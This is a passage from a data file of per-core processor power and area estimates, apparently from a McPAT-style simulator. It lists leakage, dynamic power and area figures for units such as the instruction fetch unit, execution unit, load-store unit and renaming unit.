'Load Store Unit/StoreQ/Area': 0.322079,
'Load Store Unit/StoreQ/Gate Leakage': 0.00329971,
'Load Store Unit/StoreQ/Peak Dynamic': 0.301563,
'Load Store Unit/StoreQ/Runtime Dynamic': 0.603125,
'Load Store Unit/StoreQ/Subthreshold Leakage': 0.0345621,
'Load Store Unit/StoreQ/Subthreshold Leakage with power gating': 0.0197004,
'Load Store Unit/Subthreshold Leakage': 0.591622,
'Load Store Unit/Subthreshold Leakage with power gating': 0.283406,
'Memory Management Unit/Area': 0.434579,
'Memory Management Unit/Dtlb/Area': 0.0879726,
'Memory Management Unit/Dtlb/Gate Leakage': 0.00088729,
'Memory Management Unit/Dtlb/Peak Dynamic': 0.107026,
'Memory Management Unit/Dtlb/Runtime Dynamic': 0.107838,
'Memory Management Unit/Dtlb/Subthreshold Leakage': 0.0155699,
'Memory Management Unit/Dtlb/Subthreshold Leakage with power gating': 0.00887485,
'Memory Management Unit/Gate Leakage': 0.00813591,
'Memory Management Unit/Itlb/Area': 0.301552,
'Memory Management Unit/Itlb/Gate Leakage': 0.00393464,
'Memory Management Unit/Itlb/Peak Dynamic': 0.359317,
'Memory Management Unit/Itlb/Runtime Dynamic': 0.036005,
'Memory Management Unit/Itlb/Subthreshold Leakage': 0.0413758,
'Memory Management Unit/Itlb/Subthreshold Leakage with power gating': 0.0235842,
'Memory Management Unit/Peak Dynamic': 0.702842,
'Memory Management Unit/Runtime Dynamic': 0.143843,
'Memory Management Unit/Subthreshold Leakage': 0.0769113,
'Memory Management Unit/Subthreshold Leakage with power gating': 0.0399462,
'Peak Dynamic': 25.393,
'Renaming Unit/Area': 0.369768,
'Renaming Unit/FP Front End RAT/Area': 0.168486,
'Renaming Unit/FP Front End RAT/Gate Leakage': 0.00489731,
'Renaming Unit/FP Front End RAT/Peak Dynamic': 3.33511,
'Renaming Unit/FP Front End RAT/Runtime Dynamic': 0.28148,
'Renaming Unit/FP Front End RAT/Subthreshold Leakage': 0.0437281,
'Renaming Unit/FP Front End RAT/Subthreshold Leakage with power gating': 0.024925,
'Renaming Unit/Free List/Area': 0.0414755,
'Renaming Unit/Free List/Gate Leakage': 4.15911e-05,
'Renaming Unit/Free List/Peak Dynamic': 0.0401324,
'Renaming Unit/Free List/Runtime Dynamic': 0.0214127,
'Renaming Unit/Free List/Subthreshold Leakage': 0.000670426,
'Renaming Unit/Free List/Subthreshold Leakage with power gating': 0.000377987,
'Renaming Unit/Gate Leakage': 0.00863632,
'Renaming Unit/Int Front End RAT/Area': 0.114751,
'Renaming Unit/Int Front End RAT/Gate Leakage': 0.00038343,
'Renaming Unit/Int Front End RAT/Peak Dynamic': 0.86945,
'Renaming Unit/Int Front End RAT/Runtime Dynamic': 0.179184,
'Renaming Unit/Int Front End RAT/Subthreshold Leakage': 0.00611897,
'Renaming Unit/Int Front End RAT/Subthreshold Leakage with power gating': 0.00348781,
'Renaming Unit/Peak Dynamic': 4.56169,
'Renaming Unit/Runtime Dynamic': 0.482076,
'Renaming Unit/Subthreshold Leakage': 0.070483,
'Renaming Unit/Subthreshold Leakage with power gating': 0.0362779,
'Runtime Dynamic': 7.23401,
'Subthreshold Leakage': 6.21877,
'Subthreshold Leakage with power gating': 2.58311},
{'Area': 32.6082,
'Execution Unit/Area': 8.2042,
'Execution Unit/Complex ALUs/Area': 0.235435,
'Execution Unit/Complex ALUs/Gate Leakage': 0.0132646,
'Execution Unit/Complex ALUs/Peak Dynamic': 0.0758444,
'Execution Unit/Complex ALUs/Runtime Dynamic': 0.26226,
'Execution Unit/Complex ALUs/Subthreshold Leakage': 0.20111,
'Execution Unit/Complex ALUs/Subthreshold Leakage with power gating': 0.0754163,
'Execution Unit/Floating Point Units/Area': 4.6585,
'Execution Unit/Floating Point Units/Gate Leakage': 0.0656156,
'Execution Unit/Floating Point Units/Peak Dynamic': 0.409911,
'Execution Unit/Floating Point Units/Runtime Dynamic': 0.484359,
'Execution Unit/Floating Point Units/Subthreshold Leakage': 0.994829,
'Execution Unit/Floating Point Units/Subthreshold Leakage with power gating': 0.373061,
'Execution Unit/Gate Leakage': 0.122718,
'Execution Unit/Instruction Scheduler/Area': 2.17927,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Area': 0.328073,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Gate Leakage': 0.00115349,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Peak Dynamic': 1.20978,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Runtime Dynamic': 0.337593,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Subthreshold Leakage': 0.017004,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Subthreshold Leakage with power gating': 0.00962066,
'Execution Unit/Instruction Scheduler/Gate Leakage': 0.00730101,
'Execution Unit/Instruction Scheduler/Instruction Window/Area': 1.00996,
'Execution Unit/Instruction Scheduler/Instruction Window/Gate Leakage': 0.00529112,
'Execution Unit/Instruction Scheduler/Instruction Window/Peak Dynamic': 2.07911,
'Execution Unit/Instruction Scheduler/Instruction Window/Runtime Dynamic': 0.58459,
'Execution Unit/Instruction Scheduler/Instruction Window/Subthreshold Leakage': 0.0800117,
'Execution Unit/Instruction Scheduler/Instruction Window/Subthreshold Leakage with power gating': 0.0455351,
'Execution Unit/Instruction Scheduler/Peak Dynamic': 4.84781,
'Execution Unit/Instruction Scheduler/ROB/Area': 0.841232,
'Execution Unit/Instruction Scheduler/ROB/Gate Leakage': 0.000856399,
'Execution Unit/Instruction Scheduler/ROB/Peak Dynamic': 1.55892,
'Execution Unit/Instruction Scheduler/ROB/Runtime Dynamic': 0.385514,
'Execution Unit/Instruction Scheduler/ROB/Subthreshold Leakage': 0.0178624,
'Execution Unit/Instruction Scheduler/ROB/Subthreshold Leakage with power gating': 0.00897339,
'Execution Unit/Instruction Scheduler/Runtime Dynamic': 1.3077,
'Execution Unit/Instruction Scheduler/Subthreshold Leakage': 0.114878,
'Execution Unit/Instruction Scheduler/Subthreshold Leakage with power gating': 0.0641291,
'Execution Unit/Integer ALUs/Area': 0.47087,
'Execution Unit/Integer ALUs/Gate Leakage': 0.0265291,
'Execution Unit/Integer ALUs/Peak Dynamic': 0.270852,
'Execution Unit/Integer ALUs/Runtime Dynamic': 0.373508,
'Execution Unit/Integer ALUs/Subthreshold Leakage': 0.40222,
'Execution Unit/Integer ALUs/Subthreshold Leakage with power gating': 0.150833,
'Execution Unit/Peak Dynamic': 6.13883,
'Execution Unit/Register Files/Area': 0.570804,
'Execution Unit/Register Files/Floating Point RF/Area': 0.208131,
'Execution Unit/Register Files/Floating Point RF/Gate Leakage': 0.000232788,
'Execution Unit/Register Files/Floating Point RF/Peak Dynamic': 0.0774411,
'Execution Unit/Register Files/Floating Point RF/Runtime Dynamic': 0.012238,
'Execution Unit/Register Files/Floating Point RF/Subthreshold Leakage': 0.00399698,
'Execution Unit/Register Files/Floating Point RF/Subthreshold Leakage with power gating': 0.00176968,
'Execution Unit/Register Files/Gate Leakage': 0.000622708,
'Execution Unit/Register Files/Integer RF/Area': 0.362673,
'Execution Unit/Register Files/Integer RF/Gate Leakage': 0.00038992,
'Execution Unit/Register Files/Integer RF/Peak Dynamic': 0.116878,
'Execution Unit/Register Files/Integer RF/Runtime Dynamic': 0.0905077,
'Execution Unit/Register Files/Integer RF/Subthreshold Leakage': 0.00614175,
'Execution Unit/Register Files/Integer RF/Subthreshold Leakage with power gating': 0.00246675,
'Execution Unit/Register Files/Peak Dynamic': 0.194319,
'Execution Unit/Register Files/Runtime Dynamic': 0.102746,
'Execution Unit/Register Files/Subthreshold Leakage': 0.0101387,
'Execution Unit/Register Files/Subthreshold Leakage with power gating': 0.00423643,
'Execution Unit/Results Broadcast Bus/Area Overhead': 0.0442632,
'Execution Unit/Results Broadcast Bus/Gate Leakage': 0.00607074,
'Execution Unit/Results Broadcast Bus/Peak Dynamic': 0.303204,
'Execution Unit/Results Broadcast Bus/Runtime Dynamic': 0.763138,
'Execution Unit/Results Broadcast Bus/Subthreshold Leakage': 0.0920413,
'Execution Unit/Results Broadcast Bus/Subthreshold Leakage with power gating': 0.0345155,
'Execution Unit/Runtime Dynamic': 3.29371,
'Execution Unit/Subthreshold Leakage': 1.83518,
'Execution Unit/Subthreshold Leakage with power gating': 0.709678,
'Gate Leakage': 0.372997,
'Instruction Fetch Unit/Area': 5.86007,
'Instruction Fetch Unit/Branch Predictor/Area': 0.138516,
'Instruction Fetch Unit/Branch Predictor/Chooser/Area': 0.0435221,
'Instruction Fetch Unit/Branch Predictor/Chooser/Gate Leakage': 0.000278362,
'Instruction Fetch Unit/Branch Predictor/Chooser/Peak Dynamic': 0.0168831,
'Instruction Fetch Unit/Branch Predictor/Chooser/Runtime Dynamic': 0.00176219,
'Instruction Fetch Unit/Branch Predictor/Chooser/Subthreshold Leakage': 0.00759719,
'Instruction Fetch Unit/Branch Predictor/Chooser/Subthreshold Leakage with power gating': 0.0039236,
'Instruction Fetch Unit/Branch Predictor/Gate Leakage': 0.000757657,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Area': 0.0435221,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Gate Leakage': 0.000278362,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Peak Dynamic': 0.0168831,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Runtime Dynamic': 0.00176219,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Subthreshold Leakage': 0.00759719,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Subthreshold Leakage with power gating': 0.0039236,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Area': 0.0257064,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Gate Leakage': 0.000154548,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Peak Dynamic': 0.0142575,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Runtime Dynamic': 0.00154193,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Subthreshold Leakage': 0.00384344,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Subthreshold Leakage with power gating': 0.00198631,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Area': 0.0151917,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Gate Leakage': 8.00196e-05,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Peak Dynamic': 0.00527447,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Runtime Dynamic': 0.000600772,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Subthreshold Leakage': 0.00181347,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Subthreshold Leakage with power gating': 0.000957045,
'Instruction Fetch Unit/Branch Predictor/Peak Dynamic': 0.0597838,
'Instruction Fetch Unit/Branch Predictor/RAS/Area': 0.0105732,
'Instruction Fetch Unit/Branch Predictor/RAS/Gate Leakage': 4.63858e-05,
'Instruction Fetch Unit/Branch Predictor/RAS/Peak Dynamic': 0.0117602,
'Instruction Fetch Unit/Branch Predictor/RAS/Runtime Dynamic': 0.00130015,
'Instruction Fetch Unit/Branch Predictor/RAS/Subthreshold Leakage': 0.000932505,
'Instruction Fetch Unit/Branch Predictor/RAS/Subthreshold Leakage with power gating': 0.000494733,
'Instruction Fetch Unit/Branch Predictor/Runtime Dynamic': 0.00636647,
'Instruction Fetch Unit/Branch Predictor/Subthreshold Leakage': 0.0199703,
'Instruction Fetch Unit/Branch Predictor/Subthreshold Leakage with power gating': 0.0103282,
'Instruction Fetch Unit/Branch Target Buffer/Area': 0.64954,
'Instruction Fetch Unit/Branch Target Buffer/Gate Leakage': 0.00272758,
'Instruction Fetch Unit/Branch Target Buffer/Peak Dynamic': 0.177867,
'Instruction Fetch Unit/Branch Target Buffer/Runtime Dynamic': 0.0166433,
'Instruction Fetch Unit/Branch Target Buffer/Subthreshold Leakage': 0.0811682,
'Instruction Fetch Unit/Branch Target Buffer/Subthreshold Leakage with power gating': 0.0435357,
'Instruction Fetch Unit/Gate Leakage': 0.0590479,
'Instruction Fetch Unit/Instruction Buffer/Area': 0.0226323,
'Instruction Fetch Unit/Instruction Buffer/Gate Leakage': 6.83558e-05,
'Instruction Fetch Unit/Instruction Buffer/Peak Dynamic': 0.606827,
'Instruction Fetch Unit/Instruction Buffer/Runtime Dynamic': 0.0870074,
'Instruction Fetch Unit/Instruction Buffer/Subthreshold Leakage': 0.00151885,
'Instruction Fetch Unit/Instruction Buffer/Subthreshold Leakage with power gating': 0.000701682,
'Instruction Fetch Unit/Instruction Cache/Area': 3.14635,
'Instruction Fetch Unit/Instruction Cache/Gate Leakage': 0.029931,
'Instruction Fetch Unit/Instruction Cache/Peak Dynamic': 5.53441,
'Instruction Fetch Unit/Instruction Cache/Runtime Dynamic': 0.211193,
'Instruction Fetch Unit/Instruction Cache/Subthreshold Leakage': 0.367022,
'Instruction Fetch Unit/Instruction Cache/Subthreshold Leakage with power gating': 0.180386,
'Instruction Fetch Unit/Instruction Decoder/Area': 1.85799,
'Instruction Fetch Unit/Instruction Decoder/Gate Leakage': 0.0222493,
'Instruction Fetch Unit/Instruction Decoder/Peak Dynamic': 1.37404,
'Instruction Fetch Unit/Instruction Decoder/Runtime Dynamic': 0.295516,
'Instruction Fetch Unit/Instruction Decoder/Subthreshold Leakage': 0.442943,
'Instruction Fetch Unit/Instruction Decoder/Subthreshold Leakage with power gating': 0.166104,
'Instruction Fetch Unit/Peak Dynamic': 8.02563,
'Instruction Fetch Unit/Runtime Dynamic': 0.616727,
'Instruction Fetch Unit/Subthreshold Leakage': 0.932587,
'Instruction Fetch Unit/Subthreshold Leakage with power gating': 0.408542,
'L2/Area': 4.53318,
'L2/Gate Leakage': 0.015464,
'L2/Peak Dynamic': 0.0455747,
'L2/Runtime Dynamic': 0.00960554,
'L2/Subthreshold Leakage': 0.834142,
'L2/Subthreshold Leakage with power gating': 0.401066,
'Load Store Unit/Area': 8.80969,
'Load Store Unit/Data Cache/Area': 6.84535,
'Load Store Unit/Data Cache/Gate Leakage': 0.0279261,
'Load Store Unit/Data Cache/Peak Dynamic': 4.85698,
'Load Store Unit/Data Cache/Runtime Dynamic': 1.73924,
'Load Store Unit/Data Cache/Subthreshold Leakage': 0.527675,
'Load Store Unit/Data Cache/Subthreshold Leakage with power gating': 0.25085,
'Load Store Unit/Gate Leakage': 0.0351387,
'Load Store Unit/LoadQ/Area': 0.0836782,
'Load Store Unit/LoadQ/Gate Leakage': 0.00059896,
'Load Store Unit/LoadQ/Peak Dynamic': 0.117111,
'Load Store Unit/LoadQ/Runtime Dynamic': 0.117111,
'Load Store Unit/LoadQ/Subthreshold Leakage': 0.00941961,
'Load Store Unit/LoadQ/Subthreshold Leakage with power gating': 0.00536918,
'Load Store Unit/Peak Dynamic': 5.41226,
'Load Store Unit/Runtime Dynamic': 2.4339,
'Load Store Unit/StoreQ/Area': 0.322079,
'Load Store Unit/StoreQ/Gate Leakage': 0.00329971,
'Load Store Unit/StoreQ/Peak Dynamic': 0.288776,
'Load Store Unit/StoreQ/Runtime Dynamic': 0.577552,
'Load Store Unit/StoreQ/Subthreshold Leakage': 0.0345621,
'Load Store Unit/StoreQ/Subthreshold Leakage with power gating': 0.0197004,
'Load Store Unit/Subthreshold Leakage': 0.591622,
'Load Store Unit/Subthreshold Leakage with power gating': 0.283406,
'Memory Management Unit/Area': 0.434579,
'Memory Management Unit/Dtlb/Area': 0.0879726,
'Memory Management Unit/Dtlb/Gate Leakage': 0.00088729,
'Memory Management Unit/Dtlb/Peak Dynamic': 0.102488,
'Memory Management Unit/Dtlb/Runtime Dynamic': 0.103171,
'Memory Management Unit/Dtlb/Subthreshold Leakage': 0.0155699,
'Memory Management Unit/Dtlb/Subthreshold Leakage with power gating': 0.00887485,
'Memory Management Unit/Gate Leakage': 0.00813591,
'Memory Management Unit/Itlb/Area': 0.301552,
'Memory Management Unit/Itlb/Gate Leakage': 0.00393464,
'Memory Management Unit/Itlb/Peak Dynamic': 0.344109,
'Memory Management Unit/Itlb/Runtime Dynamic': 0.0346112,
'Memory Management Unit/Itlb/Subthreshold Leakage': 0.0413758,
'Memory Management Unit/Itlb/Subthreshold Leakage with power gating': 0.0235842,
'Memory Management Unit/Peak Dynamic': 0.679789,
'Memory Management Unit/Runtime Dynamic': 0.137783,
'Memory Management Unit/Subthreshold Leakage': 0.0769113,
'Memory Management Unit/Subthreshold Leakage with power gating': 0.0399462,
'Peak Dynamic': 24.8638,
'Renaming Unit/Area': 0.369768,
'Renaming Unit/FP Front End RAT/Area': 0.168486,
'Renaming Unit/FP Front End RAT/Gate Leakage': 0.00489731,
'Renaming Unit/FP Front End RAT/Peak Dynamic': 3.33511,
'Renaming Unit/FP Front End RAT/Runtime Dynamic': 0.270174,
'Renaming Unit/FP Front End RAT/Subthreshold Leakage': 0.0437281,
'Renaming Unit/FP Front End RAT/Subthreshold Leakage with power gating': 0.024925,
'Renaming Unit/Free List/Area': 0.0414755,
'Renaming Unit/Free List/Gate Leakage': 4.15911e-05,
'Renaming Unit/Free List/Peak Dynamic': 0.0401324,
'Renaming Unit/Free List/Runtime Dynamic': 0.0205137,
'Renaming Unit/Free List/Subthreshold Leakage': 0.000670426,
'Renaming Unit/Free List/Subthreshold Leakage with power gating': 0.000377987,
'Renaming Unit/Gate Leakage': 0.00863632,
'Renaming Unit/Int Front End RAT/Area': 0.114751,
'Renaming Unit/Int Front End RAT/Gate Leakage': 0.00038343,
'Renaming Unit/Int Front End RAT/Peak Dynamic': 0.86945,
'Renaming Unit/Int Front End RAT/Runtime Dynamic': 0.171554,
'Renaming Unit/Int Front End RAT/Subthreshold Leakage': 0.00611897,
'Renaming Unit/Int Front End RAT/Subthreshold Leakage with power gating': 0.00348781,
'Renaming Unit/Peak Dynamic': 4.56169,
'Renaming Unit/Runtime Dynamic': 0.462241,
'Renaming Unit/Subthreshold Leakage': 0.070483,
'Renaming Unit/Subthreshold Leakage with power gating': 0.0362779,
'Runtime Dynamic': 6.95397,
'Subthreshold Leakage': 6.21877,
'Subthreshold Leakage with power gating': 2.58311},
{'Area': 32.6082,
'Execution Unit/Area': 8.2042,
'Execution Unit/Complex ALUs/Area': 0.235435,
'Execution Unit/Complex ALUs/Gate Leakage': 0.0132646,
'Execution Unit/Complex ALUs/Peak Dynamic': 0.0742602,
'Execution Unit/Complex ALUs/Runtime Dynamic': 0.261016,
'Execution Unit/Complex ALUs/Subthreshold Leakage': 0.20111,
'Execution Unit/Complex ALUs/Subthreshold Leakage with power gating': 0.0754163,
'Execution Unit/Floating Point Units/Area': 4.6585,
'Execution Unit/Floating Point Units/Gate Leakage': 0.0656156,
'Execution Unit/Floating Point Units/Peak Dynamic': 0.401838,
'Execution Unit/Floating Point Units/Runtime Dynamic': 0.480808,
'Execution Unit/Floating Point Units/Subthreshold Leakage': 0.994829,
'Execution Unit/Floating Point Units/Subthreshold Leakage with power gating': 0.373061,
'Execution Unit/Gate Leakage': 0.122718,
'Execution Unit/Instruction Scheduler/Area': 2.17927,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Area': 0.328073,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Gate Leakage': 0.00115349,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Peak Dynamic': 1.20978,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Runtime Dynamic': 0.330139,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Subthreshold Leakage': 0.017004,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Subthreshold Leakage with power gating': 0.00962066,
'Execution Unit/Instruction Scheduler/Gate Leakage': 0.00730101,
'Execution Unit/Instruction Scheduler/Instruction Window/Area': 1.00996,
'Execution Unit/Instruction Scheduler/Instruction Window/Gate Leakage': 0.00529112,
'Execution Unit/Instruction Scheduler/Instruction Window/Peak Dynamic': 2.07911,
'Execution Unit/Instruction Scheduler/Instruction Window/Runtime Dynamic': 0.571682,
'Execution Unit/Instruction Scheduler/Instruction Window/Subthreshold Leakage': 0.0800117,
'Execution Unit/Instruction Scheduler/Instruction Window/Subthreshold Leakage with power gating': 0.0455351,
'Execution Unit/Instruction Scheduler/Peak Dynamic': 4.84781,
'Execution Unit/Instruction Scheduler/ROB/Area': 0.841232,
'Execution Unit/Instruction Scheduler/ROB/Gate Leakage': 0.000856399,
'Execution Unit/Instruction Scheduler/ROB/Peak Dynamic': 1.55892,
'Execution Unit/Instruction Scheduler/ROB/Runtime Dynamic': 0.377117,
'Execution Unit/Instruction Scheduler/ROB/Subthreshold Leakage': 0.0178624,
'Execution Unit/Instruction Scheduler/ROB/Subthreshold Leakage with power gating': 0.00897339,
'Execution Unit/Instruction Scheduler/Runtime Dynamic': 1.27894,
'Execution Unit/Instruction Scheduler/Subthreshold Leakage': 0.114878,
'Execution Unit/Instruction Scheduler/Subthreshold Leakage with power gating': 0.0641291,
'Execution Unit/Integer ALUs/Area': 0.47087,
'Execution Unit/Integer ALUs/Gate Leakage': 0.0265291,
'Execution Unit/Integer ALUs/Peak Dynamic': 0.264722,
'Execution Unit/Integer ALUs/Runtime Dynamic': 0.367404,
'Execution Unit/Integer ALUs/Subthreshold Leakage': 0.40222,
'Execution Unit/Integer ALUs/Subthreshold Leakage with power gating': 0.150833,
'Execution Unit/Peak Dynamic': 6.11148,
'Execution Unit/Register Files/Area': 0.570804,
'Execution Unit/Register Files/Floating Point RF/Area': 0.208131,
'Execution Unit/Register Files/Floating Point RF/Gate Leakage': 0.000232788,
'Execution Unit/Register Files/Floating Point RF/Peak Dynamic': 0.0759158,
'Execution Unit/Register Files/Floating Point RF/Runtime Dynamic': 0.0119678,
'Execution Unit/Register Files/Floating Point RF/Subthreshold Leakage': 0.00399698,
'Execution Unit/Register Files/Floating Point RF/Subthreshold Leakage with power gating': 0.00176968,
'Execution Unit/Register Files/Gate Leakage': 0.000622708,
'Execution Unit/Register Files/Integer RF/Area': 0.362673,
'Execution Unit/Register Files/Integer RF/Gate Leakage': 0.00038992,
'Execution Unit/Register Files/Integer RF/Peak Dynamic': 0.114311,
'Execution Unit/Register Files/Integer RF/Runtime Dynamic': 0.0885092,
'Execution Unit/Register Files/Integer RF/Subthreshold Leakage': 0.00614175,
'Execution Unit/Register Files/Integer RF/Subthreshold Leakage with power gating': 0.00246675,
'Execution Unit/Register Files/Peak Dynamic': 0.190227,
'Execution Unit/Register Files/Runtime Dynamic': 0.100477,
'Execution Unit/Register Files/Subthreshold Leakage': 0.0101387,
'Execution Unit/Register Files/Subthreshold Leakage with power gating': 0.00423643,
'Execution Unit/Results Broadcast Bus/Area Overhead': 0.0442632,
'Execution Unit/Results Broadcast Bus/Gate Leakage': 0.00607074,
'Execution Unit/Results Broadcast Bus/Peak Dynamic': 0.296567,
'Execution Unit/Results Broadcast Bus/Runtime Dynamic': 0.746537,
'Execution Unit/Results Broadcast Bus/Subthreshold Leakage': 0.0920413,
'Execution Unit/Results Broadcast Bus/Subthreshold Leakage with power gating': 0.0345155,
'Execution Unit/Runtime Dynamic': 3.23518,
'Execution Unit/Subthreshold Leakage': 1.83518,
'Execution Unit/Subthreshold Leakage with power gating': 0.709678,
'Gate Leakage': 0.372997,
'Instruction Fetch Unit/Area': 5.86007,
'Instruction Fetch Unit/Branch Predictor/Area': 0.138516,
'Instruction Fetch Unit/Branch Predictor/Chooser/Area': 0.0435221,
'Instruction Fetch Unit/Branch Predictor/Chooser/Gate Leakage': 0.000278362,
'Instruction Fetch Unit/Branch Predictor/Chooser/Peak Dynamic': 0.0168831,
'Instruction Fetch Unit/Branch Predictor/Chooser/Runtime Dynamic': 0.00172664,
'Instruction Fetch Unit/Branch Predictor/Chooser/Subthreshold Leakage': 0.00759719,
'Instruction Fetch Unit/Branch Predictor/Chooser/Subthreshold Leakage with power gating': 0.0039236,
'Instruction Fetch Unit/Branch Predictor/Gate Leakage': 0.000757657,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Area': 0.0435221,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Gate Leakage': 0.000278362,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Peak Dynamic': 0.0168831,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Runtime Dynamic': 0.00172664,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Subthreshold Leakage': 0.00759719,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Subthreshold Leakage with power gating': 0.0039236,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Area': 0.0257064,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Gate Leakage': 0.000154548,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Peak Dynamic': 0.0142575,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Runtime Dynamic': 0.0015109,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Subthreshold Leakage': 0.00384344,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Subthreshold Leakage with power gating': 0.00198631,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Area': 0.0151917,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Gate Leakage': 8.00196e-05,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Peak Dynamic': 0.00527447,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Runtime Dynamic': 0.00058872,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Subthreshold Leakage': 0.00181347,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Subthreshold Leakage with power gating': 0.000957045,
'Instruction Fetch Unit/Branch Predictor/Peak Dynamic': 0.0597838,
'Instruction Fetch Unit/Branch Predictor/RAS/Area': 0.0105732,
'Instruction Fetch Unit/Branch Predictor/RAS/Gate Leakage': 4.63858e-05,
'Instruction Fetch Unit/Branch Predictor/RAS/Peak Dynamic': 0.0117602,
'Instruction Fetch Unit/Branch Predictor/RAS/Runtime Dynamic': 0.00127144,
'Instruction Fetch Unit/Branch Predictor/RAS/Subthreshold Leakage': 0.000932505,
'Instruction Fetch Unit/Branch Predictor/RAS/Subthreshold Leakage with power gating': 0.000494733,
'Instruction Fetch Unit/Branch Predictor/Runtime Dynamic': 0.00623563,
'Instruction Fetch Unit/Branch Predictor/Subthreshold Leakage': 0.0199703,
'Instruction Fetch Unit/Branch Predictor/Subthreshold Leakage with power gating': 0.0103282,
'Instruction Fetch Unit/Branch Target Buffer/Area': 0.64954,
'Instruction Fetch Unit/Branch Target Buffer/Gate Leakage': 0.00272758,
'Instruction Fetch Unit/Branch Target Buffer/Peak Dynamic': 0.177867,
'Instruction Fetch Unit/Branch Target Buffer/Runtime Dynamic': 0.016305,
'Instruction Fetch Unit/Branch Target Buffer/Subthreshold Leakage': 0.0811682,
'Instruction Fetch Unit/Branch Target Buffer/Subthreshold Leakage with power gating': 0.0435357,
'Instruction Fetch Unit/Gate Leakage': 0.0590479,
'Instruction Fetch Unit/Instruction Buffer/Area': 0.0226323,
'Instruction Fetch Unit/Instruction Buffer/Gate Leakage': 6.83558e-05,
'Instruction Fetch Unit/Instruction Buffer/Peak Dynamic': 0.606827,
'Instruction Fetch Unit/Instruction Buffer/Runtime Dynamic': 0.0850862,
'Instruction Fetch Unit/Instruction Buffer/Subthreshold Leakage': 0.00151885,
'Instruction Fetch Unit/Instruction Buffer/Subthreshold Leakage with power gating': 0.000701682,
'Instruction Fetch Unit/Instruction Cache/Area': 3.14635,
'Instruction Fetch Unit/Instruction Cache/Gate Leakage': 0.029931,
'Instruction Fetch Unit/Instruction Cache/Peak Dynamic': 5.41221,
'Instruction Fetch Unit/Instruction Cache/Runtime Dynamic': 0.207506,
'Instruction Fetch Unit/Instruction Cache/Subthreshold Leakage': 0.367022,
'Instruction Fetch Unit/Instruction Cache/Subthreshold Leakage with power gating': 0.180386,
'Instruction Fetch Unit/Instruction Decoder/Area': 1.85799,
'Instruction Fetch Unit/Instruction Decoder/Gate Leakage': 0.0222493,
'Instruction Fetch Unit/Instruction Decoder/Peak Dynamic': 1.37404,
'Instruction Fetch Unit/Instruction Decoder/Runtime Dynamic': 0.288991,
'Instruction Fetch Unit/Instruction Decoder/Subthreshold Leakage': 0.442943,
'Instruction Fetch Unit/Instruction Decoder/Subthreshold Leakage with power gating': 0.166104,
'Instruction Fetch Unit/Peak Dynamic': 7.89741,
'Instruction Fetch Unit/Runtime Dynamic': 0.604123,
'Instruction Fetch Unit/Subthreshold Leakage': 0.932587,
'Instruction Fetch Unit/Subthreshold Leakage with power gating': 0.408542,
'L2/Area': 4.53318,
'L2/Gate Leakage': 0.015464,
'L2/Peak Dynamic': 0.0392334,
'L2/Runtime Dynamic': 0.00836828,
'L2/Subthreshold Leakage': 0.834142,
'L2/Subthreshold Leakage with power gating': 0.401066,
'Load Store Unit/Area': 8.80969,
'Load Store Unit/Data Cache/Area': 6.84535,
'Load Store Unit/Data Cache/Gate Leakage': 0.0279261,
'Load Store Unit/Data Cache/Peak Dynamic': 4.77778,
'Load Store Unit/Data Cache/Runtime Dynamic': 1.70139,
'Load Store Unit/Data Cache/Subthreshold Leakage': 0.527675,
'Load Store Unit/Data Cache/Subthreshold Leakage with power gating': 0.25085,
'Load Store Unit/Gate Leakage': 0.0351387,
'Load Store Unit/LoadQ/Area': 0.0836782,
'Load Store Unit/LoadQ/Gate Leakage': 0.00059896,
'Load Store Unit/LoadQ/Peak Dynamic': 0.114549,
'Load Store Unit/LoadQ/Runtime Dynamic': 0.114549,
'Load Store Unit/LoadQ/Subthreshold Leakage': 0.00941961,
'Load Store Unit/LoadQ/Subthreshold Leakage with power gating': 0.00536918,
'Load Store Unit/Peak Dynamic': 5.32091,
'Load Store Unit/Runtime Dynamic': 2.38085,
